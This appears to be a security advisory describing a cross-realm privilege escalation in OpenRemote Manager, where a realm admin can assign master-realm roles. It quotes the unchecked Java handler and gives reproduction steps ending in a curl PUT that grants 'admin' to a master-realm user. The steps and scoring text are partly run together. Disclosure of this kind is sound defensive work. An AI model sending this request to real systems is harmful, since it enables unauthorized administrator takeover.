A user who has write:admin in one Keycloak realm can call the Manager API to update Keycloak realm roles for users in another realm, including master. The handler uses the {realm} path segment when talking to the identity provider but does not check that the caller may administer that realm. This could result in a privilege escalation to master realm administrator if the attacker controls any user in master realm.
In manager/src/main/java/org/openremote/manager/security/UserResourceImpl.java, there is no check to validate if the caller should be able to administer a realm they're trying to update.
@Override
public void updateUserRealmRoles(RequestParams requestParams, String realm, String userId, String[] roles) {
try {
identityService.getIdentityProvider().updateUserRealmRoles(
realm,
userId,
roles);
} catch (ClientErrorException ex) {
ex.printStackTrace(System.out);
throw new WebApplicationException(ex.getCause(), ex.getResponse().getStatus());
} catch (Exception ex) {
throw new WebApplicationException(ex);
}
}
master. Add a user and grant that user the OpenRemote client role write:admin. Remember the realm name (call it NEW_REALM).master, pick a low-privilege user (no admin realm role). Copy that user’s UUID (<master-user-uuid>).<token>) for NEW_REALM.curl -k -X PUT "https://<host>/api/<NEW_REALM>/user/master/userRealmRoles/<master-user-uuid>" \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '["admin"]'
1.22.1Exploitability
AV:NAC:HPR:NUI:NScope
S:UImpact
C:LI:HA:L7.0/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L